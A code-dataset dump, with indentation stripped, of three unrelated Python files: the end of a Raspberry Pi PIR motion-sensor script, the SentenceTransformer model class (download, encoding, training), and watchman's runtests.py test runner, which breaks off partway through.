GPIO.add_event_detect(SENSOR_PIN , GPIO.BOTH, callback=motionPIR,
bouncetime=150)
# measurement vars
motionTimeTemp=0
baseTime=0
measured=False # Control about get baseTime only one time
while True:
if(totalMotionTime.isMovement):
if(not measured):
baseTime=time.time()
measured=True
else:
if(measured):
motionTimeTemp+=time.time()-baseTime
measured=False
if(int(time.time())%(showDataTime-1)==0):
if(totalMotionTime.isMovement):# Case if motion stills
lock.acquire()
totalMotionTime.measureTime+=(motionTimeTemp+time.time()
-baseTime)
lock.release()
else:# case are not motion
lock.acquire()
totalMotionTime.measureTime+=motionTimeTemp
lock.release()
motionTimeTemp=0
time.sleep(0.5)
if __name__=="__main__":
try:
main()
except:
print("{} line {}".format(sys.exc_info()[0],
sys.exc_info()[-1].tb_lineno))
GPIO.cleanup()
|
SentenceTransformer.py
|
import json
import logging
import os
import shutil
from collections import OrderedDict
from typing import List, Dict, Tuple, Iterable, Type, Union, Callable
from zipfile import ZipFile
import requests
import numpy as np
from numpy import ndarray
import transformers
import torch
from torch import nn, Tensor, device
from torch.optim import Optimizer
from torch.utils.data import DataLoader
import torch.multiprocessing as mp
from tqdm.autonotebook import tqdm, trange
import math
import queue
from . import __DOWNLOAD_SERVER__
from .evaluation import SentenceEvaluator
from .util import import_from_string, batch_to_device, http_get
from .models import Transformer, Pooling
from . import __version__
logger = logging.getLogger(__name__)
class SentenceTransformer(nn.Sequential):
"""
Loads or create a SentenceTransformer model, that can be used to map sentences / text to embeddings.
:param model_name_or_path: If it is a filepath on disc, it loads the model from that path. If it is not a path, it first tries to download a pre-trained SentenceTransformer model. If that fails, tries to construct a model from Huggingface models repository with that name.
:param modules: This parameter can be used to create custom SentenceTransformer models from scratch.
:param device: Device (like 'cuda' / 'cpu') that should be used for computation. If None, checks if a GPU can be used.
"""
def __init__(self, model_name_or_path: str = None, modules: Iterable[nn.Module] = None, device: str = None):
if model_name_or_path is not None and model_name_or_path != "":
logger.info("Load pretrained SentenceTransformer: {}".format(model_name_or_path))
model_path = model_name_or_path
if not os.path.isdir(model_path) and not model_path.startswith('http://') and not model_path.startswith('https://'):
logger.info("Did not find folder {}".format(model_path))
if '\\' in model_path or model_path.count('/') > 1:
raise AttributeError("Path {} not found".format(model_path))
model_path = __DOWNLOAD_SERVER__ + model_path + '.zip'
logger.info("Try to download model from server: {}".format(model_path))
if model_path.startswith('http://') or model_path.startswith('https://'):
model_url = model_path
folder_name = model_url.replace("https://", "").replace("http://", "").replace("/", "_")[:250].rstrip('.zip')
cache_folder = os.getenv('SENTENCE_TRANSFORMERS_HOME')
if cache_folder is None:
try:
from torch.hub import _get_torch_home
torch_cache_home = _get_torch_home()
except ImportError:
torch_cache_home = os.path.expanduser(os.getenv('TORCH_HOME', os.path.join(os.getenv('XDG_CACHE_HOME', '~/.cache'), 'torch')))
cache_folder = os.path.join(torch_cache_home, 'sentence_transformers')
model_path = os.path.join(cache_folder, folder_name)
if not os.path.exists(model_path) or not os.listdir(model_path):
if model_url[-1] == "/":
model_url = model_url[:-1]
logger.info("Downloading sentence transformer model from {} and saving it at {}".format(model_url, model_path))
model_path_tmp = model_path.rstrip("/").rstrip("\\")+"_part"
try:
zip_save_path = os.path.join(model_path_tmp, 'model.zip')
http_get(model_url, zip_save_path)
with ZipFile(zip_save_path, 'r') as zip:
zip.extractall(model_path_tmp)
os.remove(zip_save_path)
os.rename(model_path_tmp, model_path)
except requests.exceptions.HTTPError as e:
shutil.rmtree(model_path_tmp)
if e.response.status_code == 404:
logger.warning('SentenceTransformer-Model {} not found. Try to create it from scratch'.format(model_url))
logger.warning('Try to create Transformer Model {} with mean pooling'.format(model_name_or_path))
model_path = None
transformer_model = Transformer(model_name_or_path)
pooling_model = Pooling(transformer_model.get_word_embedding_dimension())
modules = [transformer_model, pooling_model]
else:
raise e
except Exception as e:
shutil.rmtree(model_path)
raise e
#### Load from disk
if model_path is not None:
logger.info("Load SentenceTransformer from folder: {}".format(model_path))
if os.path.exists(os.path.join(model_path, 'config.json')):
with open(os.path.join(model_path, 'config.json')) as fIn:
config = json.load(fIn)
if config['__version__'] > __version__:
logger.warning("You try to use a model that was created with version {}, however, your version is {}. This might cause unexpected behavior or errors. In that case, try to update to the latest version.\n\n\n".format(config['__version__'], __version__))
with open(os.path.join(model_path, 'modules.json')) as fIn:
contained_modules = json.load(fIn)
modules = OrderedDict()
for module_config in contained_modules:
module_class = import_from_string(module_config['type'])
module = module_class.load(os.path.join(model_path, module_config['path']))
modules[module_config['name']] = module
if modules is not None and not isinstance(modules, OrderedDict):
modules = OrderedDict([(str(idx), module) for idx, module in enumerate(modules)])
super().__init__(modules)
if device is None:
device = "cuda" if torch.cuda.is_available() else "cpu"
logger.info("Use pytorch device: {}".format(device))
self._target_device = torch.device(device)
def encode(self, sentences: Union[str, List[str], List[int]],
batch_size: int = 32,
show_progress_bar: bool = None,
output_value: str = 'sentence_embedding',
convert_to_numpy: bool = True,
convert_to_tensor: bool = False,
is_pretokenized: bool = False,
device: str = None,
num_workers: int = 0) -> Union[List[Tensor], ndarray, Tensor]:
"""
Computes sentence embeddings
:param sentences: the sentences to embed
:param batch_size: the batch size used for the computation
:param show_progress_bar: Output a progress bar when encode sentences
:param output_value: Default sentence_embedding, to get sentence embeddings. Can be set to token_embeddings to get wordpiece token embeddings.
:param convert_to_numpy: If true, the output is a list of numpy vectors. Else, it is a list of pytorch tensors.
:param convert_to_tensor: If true, you get one large tensor as return. Overwrites any setting from convert_to_numpy
:param is_pretokenized: DEPRECATED - No longer used
:param device: Which torch.device to use for the computation
:param num_workers: DEPRECATED - No longer used
:return:
By default, a list of tensors is returned. If convert_to_tensor, a stacked tensor is returned. If convert_to_numpy, a numpy matrix is returned.
"""
self.eval()
if show_progress_bar is None:
show_progress_bar = (logger.getEffectiveLevel()==logging.INFO or logger.getEffectiveLevel()==logging.DEBUG)
input_was_string = False
if isinstance(sentences, str): #Cast an individual sentence to a list with length 1
sentences = [sentences]
input_was_string = True
if device is None:
device = self._target_device
self.to(device)
all_embeddings = []
length_sorted_idx = np.argsort([self._text_length(sen) for sen in sentences])
sentences_sorted = [sentences[idx] for idx in length_sorted_idx]
iterator = range(0, len(sentences), batch_size)
if show_progress_bar:
iterator = tqdm(iterator, desc="Batches")
for start_index in iterator:
sentences_batch = sentences_sorted[start_index:start_index+batch_size]
features = self.tokenize(sentences_batch)
features = batch_to_device(features, device)
with torch.no_grad():
out_features = self.forward(features)
embeddings = out_features[output_value]
if output_value == 'token_embeddings':
#Set token embeddings to 0 for padding tokens
input_mask = out_features['attention_mask']
input_mask_expanded = input_mask.unsqueeze(-1).expand(embeddings.size()).float()
embeddings = embeddings * input_mask_expanded
embeddings = embeddings.detach()
# fixes for #522 and #487
# to avoid oom problems on gpu with large datasets
if convert_to_numpy:
embeddings = embeddings.cpu()
all_embeddings.extend(embeddings)
all_embeddings = [all_embeddings[idx] for idx in np.argsort(length_sorted_idx)]
if convert_to_tensor:
all_embeddings = torch.stack(all_embeddings)
elif convert_to_numpy:
all_embeddings = np.asarray([emb.numpy() for emb in all_embeddings])
if input_was_string:
all_embeddings = all_embeddings[0]
return all_embeddings
def start_multi_process_pool(self, target_devices: List[str] = None):
"""
Starts multi process to process the encoding with several, independent processes.
This method is recommended if you want to encode on multiple GPUs. It is advised
to start only one process per GPU. This method works together with encode_multi_process
:param target_devices: PyTorch target devices, e.g. cuda:0, cuda:1... If None, all available CUDA devices will be used
:return: Returns a dict with the target processes, an input queue and and output queue.
"""
if target_devices is None:
if torch.cuda.is_available():
target_devices = ['cuda:{}'.format(i) for i in range(torch.cuda.device_count())]
else:
logger.info("CUDA is not available. Start 4 CPU worker")
target_devices = ['cpu']*4
logger.info("Start multi-process pool on devices: {}".format(', '.join(map(str, target_devices))))
ctx = mp.get_context('spawn')
input_queue = ctx.Queue()
output_queue = ctx.Queue()
processes = []
for cuda_id in target_devices:
p = ctx.Process(target=SentenceTransformer._encode_multi_process_worker, args=(cuda_id, self, input_queue, output_queue), daemon=True)
p.start()
processes.append(p)
return {'input': input_queue, 'output': output_queue, 'processes': processes}
@staticmethod
def stop_multi_process_pool(pool):
"""
Stops all processes started with start_multi_process_pool
"""
for p in pool['processes']:
p.terminate()
for p in pool['processes']:
p.join()
p.close()
pool['input'].close()
pool['output'].close()
def encode_multi_process(self, sentences: List[str], pool: Dict[str, object], batch_size: int = 32, chunk_size: int = None):
"""
This method allows to run encode() on multiple GPUs. The sentences are chunked into smaller packages
and sent to individual processes, which encode these on the different GPUs. This method is only suitable
for encoding large sets of sentences
:param sentences: List of sentences
:param pool: A pool of workers started with SentenceTransformer.start_multi_process_pool
:param batch_size: Encode sentences with batch size
:param chunk_size: Sentences are chunked and sent to the individual processes. If none, it determine a sensible size.
:return: Numpy matrix with all embeddings
"""
if chunk_size is None:
chunk_size = min(math.ceil(len(sentences) / len(pool["processes"]) / 10), 5000)
logger.info("Chunk data into packages of size {}".format(chunk_size))
input_queue = pool['input']
last_chunk_id = 0
chunk = []
for sentence in sentences:
chunk.append(sentence)
if len(chunk) >= chunk_size:
input_queue.put([last_chunk_id, batch_size, chunk])
last_chunk_id += 1
chunk = []
if len(chunk) > 0:
input_queue.put([last_chunk_id, batch_size, chunk])
last_chunk_id += 1
output_queue = pool['output']
results_list = sorted([output_queue.get() for _ in range(last_chunk_id)], key=lambda x: x[0])
embeddings = np.concatenate([result[1] for result in results_list])
return embeddings
@staticmethod
def _encode_multi_process_worker(target_device: str, model, input_queue, results_queue):
"""
Internal working process to encode sentences in multi-process setup
"""
while True:
try:
id, batch_size, sentences = input_queue.get()
embeddings = model.encode(sentences, device=target_device, show_progress_bar=False, convert_to_numpy=True, batch_size=batch_size)
results_queue.put([id, embeddings])
except queue.Empty:
break
def get_max_seq_length(self):
"""
Returns the maximal sequence length for input the model accepts. Longer inputs will be truncated
"""
if hasattr(self._first_module(), 'max_seq_length'):
return self._first_module().max_seq_length
return None
def tokenize(self, text: str):
"""
Tokenizes the text
"""
return self._first_module().tokenize(text)
def get_sentence_features(self, *features):
return self._first_module().get_sentence_features(*features)
def get_sentence_embedding_dimension(self):
for mod in reversed(self._modules.values()):
sent_embedding_dim_method = getattr(mod, "get_sentence_embedding_dimension", None)
if callable(sent_embedding_dim_method):
return sent_embedding_dim_method()
return None
def _first_module(self):
"""Returns the first module of this sequential embedder"""
return self._modules[next(iter(self._modules))]
def _last_module(self):
"""Returns the last module of this sequential embedder"""
return self._modules[next(reversed(self._modules))]
def save(self, path):
"""
Saves all elements for this seq. sentence embedder into different sub-folders
"""
if path is None:
return
os.makedirs(path, exist_ok=True)
logger.info("Save model to {}".format(path))
contained_modules = []
for idx, name in enumerate(self._modules):
module = self._modules[name]
model_path = os.path.join(path, str(idx)+"_"+type(module).__name__)
os.makedirs(model_path, exist_ok=True)
module.save(model_path)
contained_modules.append({'idx': idx, 'name': name, 'path': os.path.basename(model_path), 'type': type(module).__module__})
with open(os.path.join(path, 'modules.json'), 'w') as fOut:
json.dump(contained_modules, fOut, indent=2)
with open(os.path.join(path, 'config.json'), 'w') as fOut:
json.dump({'__version__': __version__}, fOut, indent=2)
def smart_batching_collate(self, batch):
"""
Transforms a batch from a SmartBatchingDataset to a batch of tensors for the model
Here, batch is a list of tuples: [(tokens, label), ...]
:param batch:
a batch from a SmartBatchingDataset
:return:
a batch of tensors for the model
"""
num_texts = len(batch[0].texts)
texts = [[] for _ in range(num_texts)]
labels = []
for example in batch:
for idx, text in enumerate(example.texts):
texts[idx].append(text)
labels.append(example.label)
labels = torch.tensor(labels).to(self._target_device)
sentence_features = []
for idx in range(num_texts):
tokenized = self.tokenize(texts[idx])
batch_to_device(tokenized, self._target_device)
sentence_features.append(tokenized)
return sentence_features, labels
def _text_length(self, text: Union[List[int], List[List[int]]]):
"""
Help function to get the length for the input text. Text can be either
a list of ints (which means a single text as input), or a tuple of list of ints
(representing several text inputs to the model).
"""
if isinstance(text, dict):
return len(next(iter(text.values())))
elif len(text) == 0 or isinstance(text[0], int):
return len(text)
else:
return sum([len(t) for t in text])
def fit(self,
train_objectives: Iterable[Tuple[DataLoader, nn.Module]],
evaluator: SentenceEvaluator = None,
epochs: int = 1,
steps_per_epoch = None,
scheduler: str = 'WarmupLinear',
warmup_steps: int = 10000,
optimizer_class: Type[Optimizer] = transformers.AdamW,
optimizer_params : Dict[str, object]= {'lr': 2e-5, 'eps': 1e-6, 'correct_bias': False},
weight_decay: float = 0.01,
evaluation_steps: int = 0,
output_path: str = None,
save_best_model: bool = True,
max_grad_norm: float = 1,
use_amp: bool = False,
callback: Callable[[float, int, int], None] = None,
output_path_ignore_not_empty: bool = False
):
"""
Train the model with the given training objective
Each training objective is sampled in turn for one batch.
We sample only as many batches from each objective as there are in the smallest one
to make sure of equal training with each dataset.
:param train_objectives: Tuples of (DataLoader, LossFunction). Pass more than one for multi-task learning
:param evaluator: An evaluator (sentence_transformers.evaluation) evaluates the model performance during training on held-out dev data. It is used to determine the best model that is saved to disc.
:param epochs: Number of epochs for training
:param steps_per_epoch: Number of training steps per epoch. If set to None (default), one epoch is equal the DataLoader size from train_objectives.
:param scheduler: Learning rate scheduler. Available schedulers: constantlr, warmupconstant, warmuplinear, warmupcosine, warmupcosinewithhardrestarts
:param warmup_steps: Behavior depends on the scheduler. For WarmupLinear (default), the learning rate is increased from o up to the maximal learning rate. After these many training steps, the learning rate is decreased linearly back to zero.
:param optimizer_class: Optimizer
:param optimizer_params: Optimizer parameters
:param weight_decay: Weight decay for model parameters
:param evaluation_steps: If > 0, evaluate the model using evaluator after each number of training steps
:param output_path: Storage path for the model and evaluation files
:param save_best_model: If true, the best model (according to evaluator) is stored at output_path
:param max_grad_norm: Used for gradient normalization.
:param use_amp: Use Automatic Mixed Precision (AMP). Only for Pytorch >= 1.6.0
:param callback: Callback function that is invoked after each evaluation.
It must accept the following three parameters in this order:
`score`, `epoch`, `steps`
:param output_path_ignore_not_empty: deprecated, no longer used
"""
if use_amp:
from torch.cuda.amp import autocast
scaler = torch.cuda.amp.GradScaler()
self.to(self._target_device)
if output_path is not None:
os.makedirs(output_path, exist_ok=True)
dataloaders = [dataloader for dataloader, _ in train_objectives]
# Use smart batching
for dataloader in dataloaders:
dataloader.collate_fn = self.smart_batching_collate
loss_models = [loss for _, loss in train_objectives]
for loss_model in loss_models:
loss_model.to(self._target_device)
self.best_score = -9999999
if steps_per_epoch is None or steps_per_epoch == 0:
steps_per_epoch = min([len(dataloader) for dataloader in dataloaders])
num_train_steps = int(steps_per_epoch * epochs)
# Prepare optimizers
optimizers = []
schedulers = []
for loss_model in loss_models:
param_optimizer = list(loss_model.named_parameters())
no_decay = ['bias', 'LayerNorm.bias', 'LayerNorm.weight']
optimizer_grouped_parameters = [
{'params': [p for n, p in param_optimizer if not any(nd in n for nd in no_decay)], 'weight_decay': weight_decay},
{'params': [p for n, p in param_optimizer if any(nd in n for nd in no_decay)], 'weight_decay': 0.0}
]
optimizer = optimizer_class(optimizer_grouped_parameters, **optimizer_params)
scheduler_obj = self._get_scheduler(optimizer, scheduler=scheduler, warmup_steps=warmup_steps, t_total=num_train_steps)
optimizers.append(optimizer)
schedulers.append(scheduler_obj)
global_step = 0
data_iterators = [iter(dataloader) for dataloader in dataloaders]
num_train_objectives = len(train_objectives)
skip_scheduler = False
for epoch in trange(epochs, desc="Epoch"):
training_steps = 0
for loss_model in loss_models:
loss_model.zero_grad()
loss_model.train()
for _ in trange(steps_per_epoch, desc="Iteration", smoothing=0.05):
for train_idx in range(num_train_objectives):
loss_model = loss_models[train_idx]
optimizer = optimizers[train_idx]
scheduler = schedulers[train_idx]
data_iterator = data_iterators[train_idx]
try:
data = next(data_iterator)
except StopIteration:
data_iterator = iter(dataloaders[train_idx])
data_iterators[train_idx] = data_iterator
data = next(data_iterator)
features, labels = data
"""
num_texts = len(data[0].texts)
texts = [[] for _ in range(num_texts)]
labels = []
for example in data:
labels.append(data.label)
for idx in range(num_texts):
texts[idx].append(example.texts[idx])
features = self.tokenize(texts)
features = batch_to_device(features, self._target_device)
labels = torch.stack(labels).to(self._target_device)
"""
if use_amp:
with autocast():
loss_value = loss_model(features, labels)
scale_before_step = scaler.get_scale()
scaler.scale(loss_value).backward()
scaler.unscale_(optimizer)
torch.nn.utils.clip_grad_norm_(loss_model.parameters(), max_grad_norm)
scaler.step(optimizer)
scaler.update()
skip_scheduler = scaler.get_scale() != scale_before_step
else:
loss_value = loss_model(features, labels)
loss_value.backward()
torch.nn.utils.clip_grad_norm_(loss_model.parameters(), max_grad_norm)
optimizer.step()
optimizer.zero_grad()
if not skip_scheduler:
scheduler.step()
training_steps += 1
global_step += 1
if evaluation_steps > 0 and training_steps % evaluation_steps == 0:
self._eval_during_training(evaluator, output_path, save_best_model, epoch,
training_steps, callback)
for loss_model in loss_models:
loss_model.zero_grad()
loss_model.train()
self._eval_during_training(evaluator, output_path, save_best_model, epoch, -1, callback)
def evaluate(self, evaluator: SentenceEvaluator, output_path: str = None):
"""
Evaluate the model
:param evaluator:
the evaluator
:param output_path:
the evaluator can write the results to this path
"""
if output_path is not None:
os.makedirs(output_path, exist_ok=True)
return evaluator(self, output_path)
def _eval_during_training(self, evaluator, output_path, save_best_model, epoch, steps, callback):
"""Runs evaluation during the training"""
if evaluator is not None:
score = evaluator(self, output_path=output_path, epoch=epoch, steps=steps)
if callback is not None:
callback(score, epoch, steps)
if score > self.best_score:
self.best_score = score
if save_best_model:
self.save(output_path)
@staticmethod
def _get_scheduler(optimizer, scheduler: str, warmup_steps: int, t_total: int):
"""
Returns the correct learning rate scheduler. Available scheduler: constantlr, warmupconstant, warmuplinear, warmupcosine, warmupcosinewithhardrestarts
"""
scheduler = scheduler.lower()
if scheduler == 'constantlr':
return transformers.get_constant_schedule(optimizer)
elif scheduler == 'warmupconstant':
return transformers.get_constant_schedule_with_warmup(optimizer, num_warmup_steps=warmup_steps)
elif scheduler == 'warmuplinear':
return transformers.get_linear_schedule_with_warmup(optimizer, num_warmup_steps=warmup_steps, num_training_steps=t_total)
elif scheduler == 'warmupcosine':
return transformers.get_cosine_schedule_with_warmup(optimizer, num_warmup_steps=warmup_steps, num_training_steps=t_total)
elif scheduler == 'warmupcosinewithhardrestarts':
return transformers.get_cosine_with_hard_restarts_schedule_with_warmup(optimizer, num_warmup_steps=warmup_steps, num_training_steps=t_total)
else:
raise ValueError("Unknown scheduler {}".format(scheduler))
@property
def device(self) -> device:
"""
Get torch.device from module, assuming that the whole module has one device.
"""
try:
return next(self.parameters()).device
except StopIteration:
# For nn.DataParallel compatibility in PyTorch 1.5
def find_tensor_attributes(module: nn.Module) -> List[Tuple[str, Tensor]]:
tuples = [(k, v) for k, v in module.__dict__.items() if torch.is_tensor(v)]
return tuples
gen = self._named_members(get_members_fn=find_tensor_attributes)
first_tuple = next(gen)
return first_tuple[1].device
@property
def tokenizer(self):
"""
Property to get the tokenizer that is used by this model
"""
return self._first_module().tokenizer
@tokenizer.setter
def tokenizer(self, value):
"""
Property to set the tokenizer that is should used by this model
"""
self._first_module().tokenizer = value
@property
def max_seq_length(self):
"""
Property to get the maximal input sequence length for the model. Longer inputs will be truncated.
"""
return self._first_module().max_seq_length
@max_seq_length.setter
def max_seq_length(self, value):
"""
Property to set the maximal input sequence length for the model. Longer inputs will be truncated.
"""
self._first_module().max_seq_length = value
|
runtests.py
|
#!/usr/bin/env python3
# vim:ts=4:sw=4:et:
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
# no unicode literals
from __future__ import absolute_import, division, print_function
import argparse
import json
import math
import multiprocessing
import os
import os.path
import random
import shutil
import signal
import subprocess
import sys
import tempfile
import threading
import time
import traceback
# in the FB internal test infra, ensure that we are running from the
# dir that houses this script rather than some other higher level dir
# in the containing tree. We can't use __file__ to determine this
# because our PAR machinery can generate a name like /proc/self/fd/3/foo
# which won't resolve to anything useful by the time we get here.
if not os.path.exists("runtests.py") and os.path.exists("watchman/runtests.py"):
os.chdir("watchman")
try:
import unittest2 as unittest
except ImportError:
import unittest
# Ensure that we can find pywatchman and integration tests (if we're not the
# main module, a wrapper is probably loading us up and we shouldn't screw around
# with sys.path).
if __name__ == "__main__":
sys.path.insert(0, os.path.join(os.getcwd(), "python"))
sys.path.insert(1, os.path.join(os.getcwd(), "tests", "integration"))
sys.path.insert(1, os.path.join(os.getcwd(), "tests", "integration", "facebook"))
# Only Python 3.5+ supports native asyncio
has_asyncio = sys.version_info >= (3, 5)
if has_asyncio:
sys.path.insert(0, os.path.join(os.getcwd(), "tests", "async"))
import asyncio
try:
import queue
except Exception:
import Queue
queue = Queue
parser = argparse.ArgumentParser(
description="Run the watchman unit and integration tests"
)
parser.add_argument("-v", "--verbosity", default=2, help="test runner verbosity")
parser.add_argument(
"--keep",
action="store_true",
help="preserve all temporary files created during test execution",
)
parser.add_argument(
"--keep-if-fail",
action="store_true",
help="preserve all temporary files created during test execution if failed",
)
parser.add_argument("files", nargs="*", help="specify which test files to run")
parser.add_argument(
"--method", action="append", help="specify which python test method names to run"
)
def default_concurrency():
# Python 2.7 hangs when we use threads, so avoid it
# https://bugs.python.org/issue20318
if sys.version_info >= (3, 0):
level = min(4, math.ceil(1.5 * multiprocessing.cpu_count()))
if "CIRCLECI" in os.environ:
# Use fewer cores in circle CI because the inotify sysctls
# are pretty low, and we sometimes hit those limits.
level = level / 2
return int(level)
return 1
parser.add_argument(
"--concurrency",
default=default_concurrency(),
type=int,
help="How many tests to run at once",
)
parser.add_argument(
"--watcher",
action="store",
default="auto",
help="Specify which watcher should be used to run the tests",
)
parser.add_argument(
"--debug-watchman",
action="store_true",
help="Pauses start up and prints out the PID for watchman server process."
+ "Forces concurrency to 1.",
)
parser.add_argument(
"--watchman-path", action="store", help="Specify the path to the watchman binary"
)
parser.add_argument(
"--win7", action="store_true", help="Set env to force win7 compatibility tests"
)
parser.add_argument(
"--retry-flaky",
action="store",
type=int,
default=2,
help="How many additional times to retry flaky tests.",
)
parser.add_argument(
"--testpilot-json",
action="store_true",
help="Output test results in Test Pilot JSON format",
)
parser.add_argument(
"--pybuild-dir",
action="store",
help="For out-of-src-tree builds, where the generated python lives",
)
args = parser.parse_args()
if args.pybuild_dir is not None:
sys.path.insert(0, os.path.realpath(args.pybuild_dir))
# Import our local stuff after we've had a chance to look at args.pybuild_dir.
# The `try` block prevents the imports from being reordered
try:
import Interrupt
import pywatchman
import TempDir
import WatchmanInstance
except ImportError:
raise
# We test for this in a test case
os.environ["WATCHMAN_EMPTY_ENV_VAR"] = ""
os.environ["HGUSER"] = "John Smith <smith@example.com>"
os.environ["NOSCMLOG"] = "1"
os.environ["WATCHMAN_NO_SPAWN"] = "1"
if args.win7:
os.environ["WATCHMAN_WIN7_COMPAT"] = "1"
# Ensure that we find the watchman we built in the tests
if args.watchman_path:
args.watchman_path = os.path.realpath(args.watchman_path)
bin_dir = os.path.dirname(args.watchman_path)
os.environ["WATCHMAN_BINARY"] = args.watchman_path
else:
bin_dir = os.path.dirname(__file__)
os.environ["PYWATCHMAN_PATH"] = os.path.join(os.getcwd(), "python")
os.environ["WATCHMAN_PYTHON_BIN"] = os.path.abspath(
os.path.join(os.getcwd(), "python", "bin")
)
os.environ["PATH"] = "%s%s%s" % (
os.path.abspath(bin_dir),
os.pathsep,
os.environ["PATH"],
)
# We'll put all our temporary stuff under one dir so that we
# can clean it all up at the end
temp_dir = TempDir.get_temp_dir(args.keep)
def interrupt_handler(signo, frame):
Interrupt.setInterrupted()
signal.signal(signal.SIGINT, interrupt_handler)
class Result(unittest.TestResult):
# Make it easier to spot success/failure by coloring the status
# green for pass, red for fail and yellow for skip.
# also print the elapsed time per test
transport = None
encoding = None
attempt = 0
def shouldStop(self):
if Interrupt.wasInterrupted():
return True
return super(Result, self).shouldStop()
def startTest(self, test):
self.startTime = time.time()
super(Result, self).startTest(test)
def addSuccess(self, test):
elapsed = time.time() - self.startTime
super(Result, self).addSuccess(test)
if args.testpilot_json:
print(
json.dumps(
{
"op": "test_done",
"status": "passed",
"test": test.id(),
"start_time": self.startTime,
"end_time": time.time(),
}
)
)
else:
print(
"\033[32mPASS\033[0m %s (%.3fs)%s"
% (test.id(), elapsed, self._attempts())
)
def addSkip(self, test, reason):
elapsed = time.time() - self.startTime
super(Result, self).addSkip(test, reason)
if args.testpilot_json:
print(
json.dumps(
{
"op": "test_done",
"status": "skipped",
"test": test.id(),
"details": reason,
"start_time": self.startTime,
"end_time": time.time(),
}
)
)
else:
print("\033[33mSKIP\033[0m %s (%.3fs) %s" % (test.id(), elapsed, reason))
def __printFail(self, test, err):
elapsed = time.time() - self.startTime
t, val, trace = err
if args.testpilot_json:
print(
json.dumps(
{
"op": "test_done",
"status": "failed",
"test": test.id(),
"details": "".join(traceback.format_exception(t, val, trace)),
"start_time": self.startTime,
"end_time": time.time(),
}
)
)
else:
print(
"\033[31mFAIL\033[0m %s (%.3fs)%s\n%s"
% (
test.id(),
elapsed,
self._attempts(),
"".join(traceback.format_exception(t, val, trace)),
)
)
def addFailure(self, test, err):
self.__printFail(test, err)
super(Result, self).addFailure(test, err)
def addError(self, test, err):
self.__printFail(test, err)
super(Result, self).addError(test, err)
def setAttemptNumber(self, attempt):
self.attempt = attempt
def _attempts(self):
if self.attempt > 0:
return " (%d attempts)" % self.attempt
return ""
def expandFilesList(files):
"""expand any dir names into a full list of files"""
res = []
for g in args.files:
if os.path.isdir(g):
for dirname, _dirs, files in os.walk(g):
for f in files:
if not f.startswith("."):
res.append(os.path.normpath(os.path.join(dirname, f)))
else:
res.append(os.path.normpath(g))
return res
if args.files:
args.files = expandFilesList(args.files)
def shouldIncludeTestFile(filename):
"""used by our loader to respect the set of tests to run"""
global args
fname = os.path.relpath(filename.replace(".pyc", ".py"))
if args.files:
for f in args.files:
if f == fname:
return True
return False
if args.method:
# implies python tests only
if not fname.endswith(".py"):
return False
return True
def shouldIncludeTestName(name):
"""used by our loader to respect the set of tests to run"""
global args
if args.method:
for f in args.method:
if f in name:
# the strict original interpretation of this flag
# was pretty difficult to use in practice, so we
# now also allow substring matches against the
# entire test name.
return True
return False
return True
class Loader(unittest.TestLoader):
"""allows us to control the subset of which tests are run"""
def __init__(self):
super(Loader, self).__init__()
def loadTestsFromTestCase(self, testCaseClass):
return super(Loader, self).loadTestsFromTestCase(testCaseClass)
def getTestCaseNames(self, testCaseClass):
names = super(Loader, self).getTestCaseNames(testCaseClass)
return filter(lambda name: shouldIncludeTestName(name), names)
def loadTestsFromModule(self, module, *args, **kw):
if not shouldIncludeTestFile(module.__file__):
return unittest.TestSuite()
return super(Loader, self).loadTestsFromModule(module, *args, **kw)
loader = Loader()
suite = unittest.TestSuite()
directories = ["python/tests", "tests/integration"]
facebook_directory = "tests/integration/facebook"
if os.path.exists(facebook_directory):
# the facebook dir isn't sync'd to github, but it
# is present internally, so it should remain in this list
directories += [facebook_directory]
if has_asyncio:
directories += ["tests/async"]
for d in directories:
suite.addTests(loader.discover(d, top_level_dir=d))
if os.name == "nt":
t_globs = "tests/*.exe"
else:
t_globs = "tests/*.t"
tls = threading.local()
# Manage printing from concurrent threads
# http://stackoverflow.com/a/3030755/149111
class ThreadSafeFile(object):
def __init__(self, f):
self.f = f
self.lock = threading.RLock()
self.nesting = 0
def _getlock(self):
self.lock.acquire()
self.nesting += 1
def _droplock(self):
nesting = self.nesting
self.nesting = 0
for _ in range(nesting):
self.lock.release()
def __getattr__(self, name):
if name == "softspace":
return tls.softspace
else:
raise AttributeError(name)
def __setattr__(self, name, value):
if name == "softspace":
tls.softspace = value
else:
return object.__setattr__(self, name, value)
def write(self, data):
self._getlock()
self.f.write(data)
if data == "\n":
self._droplock()
def flush(self):
self._getlock()
self.f.flush()
self._droplock()
sys.stdout = ThreadSafeFile(sys.stdout)
tests_queue = queue.Queue()
results_queue = queue.Queue()
def runner():
global results_queue
global tests_queue
broken = False
try:
# Start up a shared watchman instance for the tests.
inst = WatchmanInstance.Instance(
{"watcher": args.watcher}, debug_watchman=args.debug_watchman
)
inst.start()
# Allow tests to locate this default instance
WatchmanInstance.setSharedInstance(inst)
if has_asyncio:
# Each thread will have its own event loop
asyncio.set_event_loop(asyncio.new_event_loop())
except Exception as e:
print("while starting watchman: %s" % str(e))
traceback.print_exc()
broken = True
while not broken:
test = tests_queue.get()
try:
if test == "terminate":
break
if Interrupt.wasInterrupted() or broken:
continue
result = None
for attempt in range(0, args.retry_flaky + 1):
# Check liveness of the server
try:
client = pywatchman.client(timeout=3.0, sockpath=inst.getSockPath())
client.query("version")
client.close()
except Exception as exc:
print(
"Failed to connect to watchman server: %s; starting a new one"
% exc
)
try:
inst.stop()
except Exception:
pass
try:
inst = WatchmanInstance.Instance(
{"watcher": args.watcher},
debug_watchman=args.debug_watchman,
)
inst.start()
# Allow tests to locate this default instance
WatchmanInstance.setSharedInstance(inst)
except Exception as e:
print("while starting watchman: %s" % str(e))
traceback.print_exc()
broken = True
continue
try:
result = Result()
result.setAttemptNumber(attempt)
if hasattr(test, "setAttemptNumber"):
test.setAttemptNumber(attempt)
test.run(result)
if hasattr(test, "setAttemptNumber") and not result.wasSuccessful():
# Facilitate retrying this possibly flaky test
continue
break
except Exception as e:
print(e)
if hasattr(test, "setAttemptNumber") and not result.wasSuccessful():
# Facilitate retrying this possibly flaky test
continue
if (
not result.wasSuccessful()
and "TRAVIS" in os.environ
and hasattr(test, "dumpLogs")
):
test.dumpLogs()
results_queue.put(result)
finally:
tests_queue.task_done()
if not broken:
inst.stop()
def expand_suite(suite, target=None):
"""recursively expand a TestSuite into a list of TestCase"""
if target is None:
target = []
for test in suite:
if isinstance(test, unittest.TestSuite):
expand_suite(test, target)
else:
